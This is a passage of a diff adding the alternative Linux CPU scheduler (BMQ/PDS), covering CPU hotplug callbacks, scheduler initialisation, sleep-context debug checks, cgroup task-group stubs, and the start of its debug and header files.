-+		 * resume sequence. As long as this is not the last online
-+		 * operation in the resume sequence, just build a single sched
-+		 * domain, ignoring cpusets.
-+		 */
-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do sync before park smpboot threads to take care the rcu boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do it's job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
-+
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take chance to reset time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state,
-+	 * since we will exit with TASK_RUNNING make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPU's synchronised, and interrupts disabled, the
-+ * and caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_files,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..e3b6320a397a
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,667 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetics problems.
-+ * A weight of a cfs_rq is the sum of weights of which entities
-+ * are queued on this cfs_rq, so a weight of a entity should not be
-+ * too large, so as the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
